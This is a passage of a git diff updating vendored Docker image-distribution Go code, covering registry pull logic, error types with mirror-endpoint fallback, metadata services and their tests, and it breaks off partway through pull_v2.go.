 // continueOnError returns true if we should fallback to the next endpoint
 // as a result of this error.
-func continueOnError(err error) bool {
+func continueOnError(err error, mirrorEndpoint bool) bool {
 	switch v := err.(type) {
 	case errcode.Errors:
 		if len(v) == 0 {
 			return true
 		}
-		return continueOnError(v[0])
+		return continueOnError(v[0], mirrorEndpoint)
 	case ErrNoSupport:
-		return continueOnError(v.Err)
+		return continueOnError(v.Err, mirrorEndpoint)
 	case errcode.Error:
-		return shouldV2Fallback(v)
+		return mirrorEndpoint || shouldV2Fallback(v)
 	case *client.UnexpectedHTTPResponseError:
 		return true
 	case ImageConfigPullError:
-		return false
+		// ImageConfigPullError only happens with v2 images, v1 fallback is
+		// unnecessary.
+		// Failures from a mirror endpoint should result in fallback to the
+		// canonical repo.
+		return mirrorEndpoint
 	case error:
-		return !strings.Contains(err.Error(), strings.ToLower(syscall.ENOSPC.Error()))
+		return !strings.Contains(err.Error(), strings.ToLower(syscall.ESRCH.Error()))
 	}
 	// let's be nice and fallback if the error is a completely
 	// unexpected one.
@@ -157,3 +177,30 @@ func retryOnError(err error) error {
 	// add them to the switch above.
 	return err
 }
+
+type invalidManifestClassError struct {
+	mediaType string
+	class     string
+}
+
+func (e invalidManifestClassError) Error() string {
+	return fmt.Sprintf("Encountered remote %q(%s) when fetching", e.mediaType, e.class)
+}
+
+func (e invalidManifestClassError) InvalidParameter() {}
+
+type invalidManifestFormatError struct{}
+
+func (invalidManifestFormatError) Error() string {
+	return "unsupported manifest format"
+}
+
+func (invalidManifestFormatError) InvalidParameter() {}
+
+type reservedNameError string
+
+func (e reservedNameError) Error() string {
+	return "'" + string(e) + "' is a reserved name"
+}
+
+func (e reservedNameError) Forbidden() {}
diff --git a/vendor/github.com/docker/docker/distribution/errors_test.go b/vendor/github.com/docker/docker/distribution/errors_test.go
new file mode 100644
index 0000000000..7105bdb4d6
--- /dev/null
+++ b/vendor/github.com/docker/docker/distribution/errors_test.go
@@ -0,0 +1,85 @@
+package distribution // import "github.com/docker/docker/distribution"
+
+import (
+	"errors"
+	"strings"
+	"syscall"
+	"testing"
+
+	"github.com/docker/distribution/registry/api/errcode"
+	"github.com/docker/distribution/registry/api/v2"
+	"github.com/docker/distribution/registry/client"
+)
+
+var alwaysContinue = []error{
+	&client.UnexpectedHTTPResponseError{},
+
+	// Some errcode.Errors that don't disprove the existence of a V1 image
+	errcode.Error{Code: errcode.ErrorCodeUnauthorized},
+	errcode.Error{Code: v2.ErrorCodeManifestUnknown},
+	errcode.Error{Code: v2.ErrorCodeNameUnknown},
+
+	errors.New("some totally unexpected error"),
+}
+
+var continueFromMirrorEndpoint = []error{
+	ImageConfigPullError{},
+
+	// Some other errcode.Error that doesn't indicate we should search for a V1 image.
+	errcode.Error{Code: errcode.ErrorCodeTooManyRequests},
+}
+
+var neverContinue = []error{
+	errors.New(strings.ToLower(syscall.ESRCH.Error())), // No such process
+}
+
+func TestContinueOnError_NonMirrorEndpoint(t *testing.T) {
+	for _, err := range alwaysContinue {
+		if !continueOnError(err, false) {
+			t.Errorf("Should continue from non-mirror endpoint: %T: '%s'", err, err.Error())
+		}
+	}
+
+	for _, err := range continueFromMirrorEndpoint {
+		if continueOnError(err, false) {
+			t.Errorf("Should only continue from mirror endpoint: %T: '%s'", err, err.Error())
+		}
+	}
+}
+
+func TestContinueOnError_MirrorEndpoint(t *testing.T) {
+	var errs []error
+	errs = append(errs, alwaysContinue...)
+	errs = append(errs, continueFromMirrorEndpoint...)
+	for _, err := range errs {
+		if !continueOnError(err, true) {
+			t.Errorf("Should continue from mirror endpoint: %T: '%s'", err, err.Error())
+		}
+	}
+}
+
+func TestContinueOnError_NeverContinue(t *testing.T) {
+	for _, isMirrorEndpoint := range []bool{true, false} {
+		for _, err := range neverContinue {
+			if continueOnError(err, isMirrorEndpoint) {
+				t.Errorf("Should never continue: %T: '%s'", err, err.Error())
+			}
+		}
+	}
+}
+
+func TestContinueOnError_UnnestsErrors(t *testing.T) {
+	// ContinueOnError should evaluate nested errcode.Errors.
+
+	// Assumes that v2.ErrorCodeNameUnknown is a continueable error code.
+	err := errcode.Errors{errcode.Error{Code: v2.ErrorCodeNameUnknown}}
+	if !continueOnError(err, false) {
+		t.Fatal("ContinueOnError should unnest, base return value on errcode.Errors")
+	}
+
+	// Assumes that errcode.ErrorCodeTooManyRequests is not a V1-fallback indication
+	err = errcode.Errors{errcode.Error{Code: errcode.ErrorCodeTooManyRequests}}
+	if continueOnError(err, false) {
+		t.Fatal("ContinueOnError should unnest, base return value on errcode.Errors")
+	}
+}
diff --git a/vendor/github.com/docker/docker/distribution/metadata/metadata.go b/vendor/github.com/docker/docker/distribution/metadata/metadata.go
index 05ba4f817d..4ae8223bd0 100644
--- a/vendor/github.com/docker/docker/distribution/metadata/metadata.go
+++ b/vendor/github.com/docker/docker/distribution/metadata/metadata.go
@@ -1,4 +1,4 @@
-package metadata
+package metadata // import "github.com/docker/docker/distribution/metadata"
 
 import (
 	"io/ioutil"
diff --git a/vendor/github.com/docker/docker/distribution/metadata/v1_id_service.go b/vendor/github.com/docker/docker/distribution/metadata/v1_id_service.go
index f262d4dc34..5575c59b0e 100644
--- a/vendor/github.com/docker/docker/distribution/metadata/v1_id_service.go
+++ b/vendor/github.com/docker/docker/distribution/metadata/v1_id_service.go
@@ -1,4 +1,4 @@
-package metadata
+package metadata // import "github.com/docker/docker/distribution/metadata"
 
 import (
 	"github.com/docker/docker/image/v1"
diff --git a/vendor/github.com/docker/docker/distribution/metadata/v1_id_service_test.go b/vendor/github.com/docker/docker/distribution/metadata/v1_id_service_test.go
index 556886581e..5003897cbb 100644
--- a/vendor/github.com/docker/docker/distribution/metadata/v1_id_service_test.go
+++ b/vendor/github.com/docker/docker/distribution/metadata/v1_id_service_test.go
@@ -1,4 +1,4 @@
-package metadata
+package metadata // import "github.com/docker/docker/distribution/metadata"
 
 import (
 	"io/ioutil"
@@ -6,6 +6,7 @@ import (
 	"testing"
 
 	"github.com/docker/docker/layer"
+	"gotest.tools/assert"
 )
 
 func TestV1IDService(t *testing.T) {
@@ -21,6 +22,10 @@ func TestV1IDService(t *testing.T) {
 	}
 	v1IDService := NewV1IDService(metadataStore)
 
+	ns := v1IDService.namespace()
+
+	assert.Equal(t, "v1id", ns)
+
 	testVectors := []struct {
 		registry string
 		v1ID     string
diff --git a/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service.go b/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service.go
index 02d1b4ad21..fe33498554 100644
--- a/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service.go
+++ b/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service.go
@@ -1,4 +1,4 @@
-package metadata
+package metadata // import "github.com/docker/docker/distribution/metadata"
 
 import (
 	"crypto/hmac"
@@ -7,9 +7,9 @@ import (
 	"encoding/json"
 	"errors"
 
-	"github.com/docker/distribution/digest"
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/layer"
+	"github.com/opencontainers/go-digest"
 )
 
 // V2MetadataService maps layer IDs to a set of known metadata for
@@ -38,7 +38,7 @@ type V2Metadata struct {
 	HMAC string
 }
 
-// CheckV2MetadataHMAC return true if the given "meta" is tagged with a hmac hashed by the given "key".
+// CheckV2MetadataHMAC returns true if the given "meta" is tagged with a hmac hashed by the given "key".
 func CheckV2MetadataHMAC(meta *V2Metadata, key []byte) bool {
 	if len(meta.HMAC) == 0 || len(key) == 0 {
 		return len(meta.HMAC) == 0 && len(key) == 0
@@ -84,7 +84,7 @@ func ComputeV2MetadataHMACKey(authConfig *types.AuthConfig) ([]byte, error) {
 	if err != nil {
 		return nil, err
 	}
-	return []byte(digest.FromBytes([]byte(buf))), nil
+	return []byte(digest.FromBytes(buf)), nil
 }
 
 // authConfigKeyInput is a reduced AuthConfig structure holding just relevant credential data eligible for
@@ -203,7 +203,7 @@ func (serv *v2MetadataService) TagAndAdd(diffID layer.DiffID, hmacKey []byte, me
 	return serv.Add(diffID, meta)
 }
 
-// Remove unassociates a metadata entry from a layer DiffID.
+// Remove disassociates a metadata entry from a layer DiffID.
 func (serv *v2MetadataService) Remove(metadata V2Metadata) error {
 	if serv.store == nil {
 		// Support a service which has no backend storage, in this case
diff --git a/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service_test.go b/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service_test.go
index 7b0ecb1572..cf24e0d85b 100644
--- a/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service_test.go
+++ b/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service_test.go
@@ -1,4 +1,4 @@
-package metadata
+package metadata // import "github.com/docker/docker/distribution/metadata"
 
 import (
 	"encoding/hex"
@@ -8,8 +8,8 @@ import (
 	"reflect"
 	"testing"
 
-	"github.com/docker/distribution/digest"
 	"github.com/docker/docker/layer"
+	"github.com/opencontainers/go-digest"
 )
 
 func TestV2MetadataService(t *testing.T) {
diff --git a/vendor/github.com/docker/docker/distribution/pull.go b/vendor/github.com/docker/docker/distribution/pull.go
index a0acfe5b6b..0240eb05f7 100644
--- a/vendor/github.com/docker/docker/distribution/pull.go
+++ b/vendor/github.com/docker/docker/distribution/pull.go
@@ -1,16 +1,19 @@
-package distribution
+package distribution // import "github.com/docker/docker/distribution"
 
 import (
+	"context"
 	"fmt"
+	"runtime"
 
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/distribution/digest"
+	"github.com/docker/distribution/reference"
 	"github.com/docker/docker/api"
 	"github.com/docker/docker/distribution/metadata"
 	"github.com/docker/docker/pkg/progress"
-	"github.com/docker/docker/reference"
+	refstore "github.com/docker/docker/reference"
 	"github.com/docker/docker/registry"
-	"golang.org/x/net/context"
+	"github.com/opencontainers/go-digest"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 )
 
 // Puller is an interface that abstracts pulling for different API versions.
@@ -18,7 +21,7 @@ type Puller interface {
 	// Pull tries to pull the image referenced by `tag`
 	// Pull returns an error if any, as well as a boolean that determines whether to retry Pull on the next configured endpoint.
 	//
-	Pull(ctx context.Context, ref reference.Named) error
+	Pull(ctx context.Context, ref reference.Named, os string) error
 }
 
 // newPuller returns a Puller interface that will pull from either a v1 or v2
@@ -55,12 +58,12 @@ func Pull(ctx context.Context, ref reference.Named, imagePullConfig *ImagePullCo
 		return err
 	}
 
-	// makes sure name is not empty or `scratch`
-	if err := ValidateRepoName(repoInfo.Name()); err != nil {
+	// makes sure name is not `scratch`
+	if err := ValidateRepoName(repoInfo.Name); err != nil {
 		return err
 	}
 
-	endpoints, err := imagePullConfig.RegistryService.LookupPullEndpoints(repoInfo.Hostname())
+	endpoints, err := imagePullConfig.RegistryService.LookupPullEndpoints(reference.Domain(repoInfo.Name))
 	if err != nil {
 		return err
 	}
@@ -104,14 +107,20 @@ func Pull(ctx context.Context, ref reference.Named, imagePullConfig *ImagePullCo
 			}
 		}
 
-		logrus.Debugf("Trying to pull %s from %s %s", repoInfo.Name(), endpoint.URL, endpoint.Version)
+		logrus.Debugf("Trying to pull %s from %s %s", reference.FamiliarName(repoInfo.Name), endpoint.URL, endpoint.Version)
 
 		puller, err := newPuller(endpoint, repoInfo, imagePullConfig)
 		if err != nil {
 			lastErr = err
 			continue
 		}
-		if err := puller.Pull(ctx, ref); err != nil {
+
+		// Make sure we default the OS if it hasn't been supplied
+		if imagePullConfig.OS == "" {
+			imagePullConfig.OS = runtime.GOOS
+		}
+
+		if err := puller.Pull(ctx, ref, imagePullConfig.OS); err != nil {
 			// Was this pull cancelled? If so, don't try to fall
 			// back.
 			fallback := false
@@ -139,19 +148,19 @@ func Pull(ctx context.Context, ref reference.Named, imagePullConfig *ImagePullCo
 					// append subsequent errors
 					lastErr = err
 				}
-				logrus.Errorf("Attempting next endpoint for pull after error: %v", err)
+				logrus.Infof("Attempting next endpoint for pull after error: %v", err)
 				continue
 			}
 			logrus.Errorf("Not continuing with pull after error: %v", err)
 			return TranslatePullError(err, ref)
 		}
 
-		imagePullConfig.ImageEventLogger(ref.String(), repoInfo.Name(), "pull")
+		imagePullConfig.ImageEventLogger(reference.FamiliarString(ref), reference.FamiliarName(repoInfo.Name), "pull")
 		return nil
 	}
 
 	if lastErr == nil {
-		lastErr = fmt.Errorf("no endpoints found for %s", ref.String())
+		lastErr = fmt.Errorf("no endpoints found for %s", reference.FamiliarString(ref))
 	}
 
 	return TranslatePullError(lastErr, ref)
@@ -170,17 +179,14 @@ func writeStatus(requestedTag string, out progress.Output, layersDownloaded bool
 }
 
 // ValidateRepoName validates the name of a repository.
-func ValidateRepoName(name string) error {
-	if name == "" {
-		return fmt.Errorf("Repository name can't be empty")
-	}
-	if name == api.NoBaseImageSpecifier {
-		return fmt.Errorf("'%s' is a reserved name", api.NoBaseImageSpecifier)
+func ValidateRepoName(name reference.Named) error {
+	if reference.FamiliarName(name) == api.NoBaseImageSpecifier {
+		return errors.WithStack(reservedNameError(api.NoBaseImageSpecifier))
 	}
 	return nil
 }
 
-func addDigestReference(store reference.Store, ref reference.Named, dgst digest.Digest, id digest.Digest) error {
+func addDigestReference(store refstore.Store, ref reference.Named, dgst digest.Digest, id digest.Digest) error {
 	dgstRef, err := reference.WithDigest(reference.TrimNamed(ref), dgst)
 	if err != nil {
 		return err
@@ -192,7 +198,7 @@ func addDigestReference(store reference.Store, ref reference.Named, dgst digest.
 			logrus.Errorf("Image ID for digest %s changed from %s to %s, cannot update", dgst.String(), oldTagID, id)
 		}
 		return nil
-	} else if err != reference.ErrDoesNotExist {
+	} else if err != refstore.ErrDoesNotExist {
 		return err
 	}
 
diff --git a/vendor/github.com/docker/docker/distribution/pull_v1.go b/vendor/github.com/docker/docker/distribution/pull_v1.go
index f44ed4f371..c26d881223 100644
--- a/vendor/github.com/docker/docker/distribution/pull_v1.go
+++ b/vendor/github.com/docker/docker/distribution/pull_v1.go
@@ -1,6 +1,7 @@
-package distribution
+package distribution // import "github.com/docker/docker/distribution"
 
 import (
+	"context"
 	"errors"
 	"fmt"
 	"io"
@@ -11,7 +12,8 @@ import (
 	"strings"
 	"time"
 
-	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution/reference"
+	"github.com/docker/distribution/registry/client/auth"
 	"github.com/docker/distribution/registry/client/transport"
 	"github.com/docker/docker/distribution/metadata"
 	"github.com/docker/docker/distribution/xfer"
@@ -22,9 +24,8 @@ import (
 	"github.com/docker/docker/pkg/ioutils"
 	"github.com/docker/docker/pkg/progress"
 	"github.com/docker/docker/pkg/stringid"
-	"github.com/docker/docker/reference"
 	"github.com/docker/docker/registry"
-	"golang.org/x/net/context"
+	"github.com/sirupsen/logrus"
 )
 
 type v1Puller struct {
@@ -35,7 +36,7 @@ type v1Puller struct {
 	session     *registry.Session
 }
 
-func (p *v1Puller) Pull(ctx context.Context, ref reference.Named) error {
+func (p *v1Puller) Pull(ctx context.Context, ref reference.Named, os string) error {
 	if _, isCanonical := ref.(reference.Canonical); isCanonical {
 		// Allowing fallback, because HTTPS v1 is before HTTP v2
 		return fallbackError{err: ErrNoSupport{Err: errors.New("Cannot pull by digest with v1 registry")}}
@@ -49,14 +50,10 @@ func (p *v1Puller) Pull(ctx context.Context, ref reference.Named) error {
 	tr := transport.NewTransport(
 		// TODO(tiborvass): was ReceiveTimeout
 		registry.NewTransport(tlsConfig),
-		registry.DockerHeaders(dockerversion.DockerUserAgent(ctx), p.config.MetaHeaders)...,
+		registry.Headers(dockerversion.DockerUserAgent(ctx), p.config.MetaHeaders)...,
 	)
 	client := registry.HTTPClient(tr)
-	v1Endpoint, err := p.endpoint.ToV1Endpoint(dockerversion.DockerUserAgent(ctx), p.config.MetaHeaders)
-	if err != nil {
-		logrus.Debugf("Could not get v1 endpoint: %v", err)
-		return fallbackError{err: err}
-	}
+	v1Endpoint := p.endpoint.ToV1Endpoint(dockerversion.DockerUserAgent(ctx), p.config.MetaHeaders)
 	p.session, err = registry.NewSession(client, p.config.AuthConfig, v1Endpoint)
 	if err != nil {
 		// TODO(dmcgowan): Check if should fallback
@@ -67,23 +64,25 @@ func (p *v1Puller) Pull(ctx context.Context, ref reference.Named) error {
 		// TODO(dmcgowan): Check if should fallback
 		return err
 	}
-	progress.Message(p.config.ProgressOutput, "", p.repoInfo.FullName()+": this image was pulled from a legacy registry.  Important: This registry version will not be supported in future versions of docker.")
+	progress.Message(p.config.ProgressOutput, "", p.repoInfo.Name.Name()+": this image was pulled from a legacy registry.  Important: This registry version will not be supported in future versions of docker.")
 
 	return nil
 }
 
-func (p *v1Puller) pullRepository(ctx context.Context, ref reference.Named) error {
-	progress.Message(p.config.ProgressOutput, "", "Pulling repository "+p.repoInfo.FullName())
+// Note use auth.Scope rather than reference.Named due to this warning causing Jenkins CI to fail:
+// warning: ref can be github.com/docker/docker/vendor/github.com/docker/distribution/registry/client/auth.Scope (interfacer)
+func (p *v1Puller) pullRepository(ctx context.Context, ref auth.Scope) error {
+	progress.Message(p.config.ProgressOutput, "", "Pulling repository "+p.repoInfo.Name.Name())
 
 	tagged, isTagged := ref.(reference.NamedTagged)
 
-	repoData, err := p.session.GetRepositoryData(p.repoInfo)
+	repoData, err := p.session.GetRepositoryData(p.repoInfo.Name)
 	if err != nil {
 		if strings.Contains(err.Error(), "HTTP code: 404") {
 			if isTagged {
-				return fmt.Errorf("Error: image %s:%s not found", p.repoInfo.RemoteName(), tagged.Tag())
+				return fmt.Errorf("Error: image %s:%s not found", reference.Path(p.repoInfo.Name), tagged.Tag())
 			}
-			return fmt.Errorf("Error: image %s not found", p.repoInfo.RemoteName())
+			return fmt.Errorf("Error: image %s not found", reference.Path(p.repoInfo.Name))
 		}
 		// Unexpected HTTP error
 		return err
@@ -92,13 +91,13 @@ func (p *v1Puller) pullRepository(ctx context.Context, ref reference.Named) erro
 	logrus.Debug("Retrieving the tag list")
 	var tagsList map[string]string
 	if !isTagged {
-		tagsList, err = p.session.GetRemoteTags(repoData.Endpoints, p.repoInfo)
+		tagsList, err = p.session.GetRemoteTags(repoData.Endpoints, p.repoInfo.Name)
 	} else {
 		var tagID string
 		tagsList = make(map[string]string)
-		tagID, err = p.session.GetRemoteTag(repoData.Endpoints, p.repoInfo, tagged.Tag())
+		tagID, err = p.session.GetRemoteTag(repoData.Endpoints, p.repoInfo.Name, tagged.Tag())
 		if err == registry.ErrRepoNotFound {
-			return fmt.Errorf("Tag %s not found in repository %s", tagged.Tag(), p.repoInfo.FullName())
+			return fmt.Errorf("Tag %s not found in repository %s", tagged.Tag(), p.repoInfo.Name.Name())
 		}
 		tagsList[tagged.Tag()] = tagID
 	}
@@ -127,7 +126,7 @@ func (p *v1Puller) pullRepository(ctx context.Context, ref reference.Named) erro
 		}
 	}
 
-	writeStatus(ref.String(), p.config.ProgressOutput, layersDownloaded)
+	writeStatus(reference.FamiliarString(ref), p.config.ProgressOutput, layersDownloaded)
 	return nil
 }
 
@@ -137,7 +136,7 @@ func (p *v1Puller) downloadImage(ctx context.Context, repoData *registry.Reposit
 		return nil
 	}
 
-	localNameRef, err := reference.WithTag(p.repoInfo, img.Tag)
+	localNameRef, err := reference.WithTag(p.repoInfo.Name, img.Tag)
 	if err != nil {
 		retErr := fmt.Errorf("Image (id: %s) has invalid tag: %s", img.ID, img.Tag)
 		logrus.Debug(retErr.Error())
@@ -148,15 +147,15 @@ func (p *v1Puller) downloadImage(ctx context.Context, repoData *registry.Reposit
 		return err
 	}
 
-	progress.Updatef(p.config.ProgressOutput, stringid.TruncateID(img.ID), "Pulling image (%s) from %s", img.Tag, p.repoInfo.FullName())
+	progress.Updatef(p.config.ProgressOutput, stringid.TruncateID(img.ID), "Pulling image (%s) from %s", img.Tag, p.repoInfo.Name.Name())
 	success := false
 	var lastErr error
 	for _, ep := range p.repoInfo.Index.Mirrors {
 		ep += "v1/"
-		progress.Updatef(p.config.ProgressOutput, stringid.TruncateID(img.ID), fmt.Sprintf("Pulling image (%s) from %s, mirror: %s", img.Tag, p.repoInfo.FullName(), ep))
+		progress.Updatef(p.config.ProgressOutput, stringid.TruncateID(img.ID), fmt.Sprintf("Pulling image (%s) from %s, mirror: %s", img.Tag, p.repoInfo.Name.Name(), ep))
 		if err = p.pullImage(ctx, img.ID, ep, localNameRef, layersDownloaded); err != nil {
 			// Don't report errors when pulling from mirrors.
-			logrus.Debugf("Error pulling image (%s) from %s, mirror: %s, %s", img.Tag, p.repoInfo.FullName(), ep, err)
+			logrus.Debugf("Error pulling image (%s) from %s, mirror: %s, %s", img.Tag, p.repoInfo.Name.Name(), ep, err)
 			continue
 		}
 		success = true
@@ -164,12 +163,12 @@ func (p *v1Puller) downloadImage(ctx context.Context, repoData *registry.Reposit
 	}
 	if !success {
 		for _, ep := range repoData.Endpoints {
-			progress.Updatef(p.config.ProgressOutput, stringid.TruncateID(img.ID), "Pulling image (%s) from %s, endpoint: %s", img.Tag, p.repoInfo.FullName(), ep)
+			progress.Updatef(p.config.ProgressOutput, stringid.TruncateID(img.ID), "Pulling image (%s) from %s, endpoint: %s", img.Tag, p.repoInfo.Name.Name(), ep)
 			if err = p.pullImage(ctx, img.ID, ep, localNameRef, layersDownloaded); err != nil {
 				// It's not ideal that only the last error is returned, it would be better to concatenate the errors.
 				// As the error is also given to the output stream the user will see the error.
 				lastErr = err
-				progress.Updatef(p.config.ProgressOutput, stringid.TruncateID(img.ID), "Error pulling image (%s) from %s, endpoint: %s, %s", img.Tag, p.repoInfo.FullName(), ep, err)
+				progress.Updatef(p.config.ProgressOutput, stringid.TruncateID(img.ID), "Error pulling image (%s) from %s, endpoint: %s, %s", img.Tag, p.repoInfo.Name.Name(), ep, err)
 				continue
 			}
 			success = true
@@ -177,7 +176,7 @@ func (p *v1Puller) downloadImage(ctx context.Context, repoData *registry.Reposit
 		}
 	}
 	if !success {
-		err := fmt.Errorf("Error pulling image (%s) from %s, %v", img.Tag, p.repoInfo.FullName(), lastErr)
+		err := fmt.Errorf("Error pulling image (%s) from %s, %v", img.Tag, p.repoInfo.Name.Name(), lastErr)
 		progress.Update(p.config.ProgressOutput, stringid.TruncateID(img.ID), err.Error())
 		return err
 	}
@@ -232,7 +231,7 @@ func (p *v1Puller) pullImage(ctx context.Context, v1ID, endpoint string, localNa
 	}
 
 	rootFS := image.NewRootFS()
-	resultRootFS, release, err := p.config.DownloadManager.Download(ctx, *rootFS, descriptors, p.config.ProgressOutput)
+	resultRootFS, release, err := p.config.DownloadManager.Download(ctx, *rootFS, "", descriptors, p.config.ProgressOutput)
 	if err != nil {
 		return err
 	}
diff --git a/vendor/github.com/docker/docker/distribution/pull_v2.go b/vendor/github.com/docker/docker/distribution/pull_v2.go
index 88807edc7d..60a894b1c3 100644
--- a/vendor/github.com/docker/docker/distribution/pull_v2.go
+++ b/vendor/github.com/docker/docker/distribution/pull_v2.go
@@ -1,21 +1,21 @@
-package distribution
+package distribution // import "github.com/docker/docker/distribution"
 
 import (
+	"context"
 	"encoding/json"
-	"errors"
 	"fmt"
 	"io"
 	"io/ioutil"
 	"net/url"
 	"os"
 	"runtime"
+	"strings"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/distribution"
-	"github.com/docker/distribution/digest"
 	"github.com/docker/distribution/manifest/manifestlist"
 	"github.com/docker/distribution/manifest/schema1"
 	"github.com/docker/distribution/manifest/schema2"
+	"github.com/docker/distribution/reference"
 	"github.com/docker/distribution/registry/api/errcode"
 	"github.com/docker/distribution/registry/client/auth"
 	"github.com/docker/distribution/registry/client/transport"
@@ -27,9 +27,13 @@ import (
 	"github.com/docker/docker/pkg/ioutils"
 	"github.com/docker/docker/pkg/progress"
 	"github.com/docker/docker/pkg/stringid"
-	"github.com/docker/docker/reference"
+	"github.com/docker/docker/pkg/system"
+	refstore "github.com/docker/docker/reference"
 	"github.com/docker/docker/registry"
-	"golang.org/x/net/context"
+	"github.com/opencontainers/go-digest"
+	specs "github.com/opencontainers/image-spec/specs-go/v1"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 )
 
 var (
@@ -59,7 +63,7 @@ type v2Puller struct {
 	confirmedV2 bool
 }
 
-func (p *v2Puller) Pull(ctx context.Context, ref reference.Named) (err error) {
+func (p *v2Puller) Pull(ctx context.Context, ref reference.Named, os string) (err error) {
 	// TODO(tiborvass): was ReceiveTimeout
 	p.repo, p.confirmedV2, err = NewV2Repository(ctx, p.repoInfo, p.endpoint, p.config.MetaHeaders, p.config.AuthConfig, "pull")
 	if err != nil {
@@ -67,12 +71,11 @@ func (p *v2Puller) Pull(ctx context.Context, ref reference.Named) (err error) {
 		return err
 	}
 
-	if err = p.pullV2Repository(ctx, ref); err != nil {
+	if err = p.pullV2Repository(ctx, ref, os); err != nil {
 		if _, ok := err.(fallbackError); ok {
 			return err
 		}
-		if continueOnError(err) {
-			logrus.Errorf("Error trying v2 registry: %v", err)
+		if continueOnError(err, p.endpoint.Mirror) {
 			return fallbackError{
 				err:         err,
 				confirmedV2: p.confirmedV2,
@@ -83,10 +86,10 @@ func (p *v2Puller) Pull(ctx context.Context, ref reference.Named) (err error) {
 	return err
 }
 
-func (p *v2Puller) pullV2Repository(ctx context.Context, ref reference.Named) (err error) {
+func (p *v2Puller) pullV2Repository(ctx context.Context, ref reference.Named, os string) (err error) {
 	var layersDownloaded bool
 	if !reference.IsNameOnly(ref) {
-		layersDownloaded, err = p.pullV2Tag(ctx, ref)
+		layersDownloaded, err = p.pullV2Tag(ctx, ref, os)
 		if err != nil {
 			return err
 		}
@@ -108,7 +111,7 @@ func (p *v2Puller) pullV2Repository(ctx context.Context, ref reference.Named) (e
 			if err != nil {
 				return err
 			}
-			pulledNew, err := p.pullV2Tag(ctx, tagRef)
+			pulledNew, err := p.pullV2Tag(ctx, tagRef, os)
 			if err != nil {
 				// Since this is the pull-all-tags case, don't
 				// allow an error pulling a particular tag to
@@ -124,13 +127,14 @@ func (p *v2Puller) pullV2Repository(ctx context.Context, ref reference.Named) (e
 		}
 	}
 
-	writeStatus(ref.String(), p.config.ProgressOutput, layersDownloaded)
+	writeStatus(reference.FamiliarString(ref), p.config.ProgressOutput, layersDownloaded)
 
 	return nil
 }
 
 type v2LayerDescriptor struct {
 	digest            digest.Digest
+	diffID            layer.DiffID
 	repoInfo          *registry.RepositoryInfo
 	repo              distribution.Repository
 	V2MetadataService metadata.V2MetadataService
@@ -148,6 +152,9 @@ func (ld *v2LayerDescriptor) ID() string {
 }
 
 func (ld *v2LayerDescriptor) DiffID() (layer.DiffID, error) {
+	if ld.diffID != "" {
+		return ld.diffID, nil
+	}
 	return ld.V2MetadataService.GetDiffID(ld.digest)
 }
 
@@ -228,10 +235,7 @@ func (ld *v2LayerDescriptor) Download(ctx context.Context, progressOutput progre
 	defer reader.Close()
 
 	if ld.verifier == nil {
-		ld.verifier, err = digest.NewDigestVerifier(ld.digest)
-		if err != nil {
-			return nil, 0, xfer.DoNotRetry{Err: err}
-		}
+		ld.verifier = ld.digest.Verifier()
 	}
 
 	_, err = io.Copy(tmpFile, io.TeeReader(reader, ld.verifier))
@@ -320,10 +324,10 @@ func (ld *v2LayerDescriptor) truncateDownloadFile() error {
 
 func (ld *v2LayerDescriptor) Registered(diffID layer.DiffID) {
 	// Cache mapping from this layer's DiffID to the blobsum
-	ld.V2MetadataService.Add(diffID, metadata.V2Metadata{Digest: ld.digest, SourceRepository: ld.repoInfo.FullName()})
+	ld.V2MetadataService.Add(diffID, metadata.V2Metadata{Digest: ld.digest, SourceRepository: ld.repoInfo.Name.Name()})
 }
 
-func (p *v2Puller) pullV2Tag(ctx context.Context, ref reference.Named) (tagUpdated bool, err error) {
+func (p *v2Puller) pullV2Tag(ctx context.Context, ref reference.Named, os string) (tagUpdated bool, err error) {
 	manSvc, err := p.repo.Manifests(ctx)
 	if err != nil {
 		return false, err
@@ -333,20 +337,20 @@ func (p *v2Puller) pullV2Tag(ctx context.Context, ref reference.Named) (tagUpdat
 		manifest    distribution.Manifest
 		tagOrDigest string // Used for logging/progress only
 	)
-	if tagged, isTagged := ref.(reference.NamedTagged); isTagged {
-		manifest, err = manSvc.Get(ctx, "", distribution.WithTag(tagged.Tag()))
-		if err != nil {
-			return false, allowV1Fallback(err)
-		}
-		tagOrDigest = tagged.Tag()
-	} else if digested, isDigested := ref.(reference.Canonical); isDigested {
+	if digested, isDigested := ref.(reference.Canonical); isDigested {
 		manifest, err = manSvc.Get(ctx, digested.Digest())
 		if err != nil {
 			return false, err
 		}
 		tagOrDigest = digested.Digest().String()
+	} else if tagged, isTagged := ref.(reference.NamedTagged); isTagged {
+		manifest, err = manSvc.Get(ctx, "", distribution.WithTag(tagged.Tag()))
+		if err != nil {
+			return false, allowV1Fallback(err)
+		}
+		tagOrDigest = tagged.Tag()
 	} else {
-		return false, fmt.Errorf("internal error: reference has neither a tag nor a digest: %s", ref.String())
+		return false, fmt.Errorf("internal error: reference has neither a tag nor a digest: %s", reference.FamiliarString(ref))
 	}
 
 	if manifest == nil {
@@ -366,7 +370,7 @@ func (p *v2Puller) pullV2Tag(ctx context.Context, ref reference.Named) (tagUpdat
 			if configClass == "" {
 				configClass = "unknown"
 			}
-			return false, fmt.Errorf("target is %s", configClass)
+			return false, invalidManifestClassError{m.Manifest.Config.MediaType, configClass}
 		}
 	}
 
@@ -374,8 +378,8 @@ func (p *v2Puller) pullV2Tag(ctx context.Context, ref reference.Named) (tagUpdat
 	// the other side speaks the v2 protocol.
 	p.confirmedV2 = true
 
-	logrus.Debugf("Pulling ref from V2 registry: %s", ref.String())
-	progress.Message(p.config.ProgressOutput, tagOrDigest, "Pulling from "+p.repo.Named().Name())
+	logrus.Debugf("Pulling ref from V2 registry: %s", reference.FamiliarString(ref))
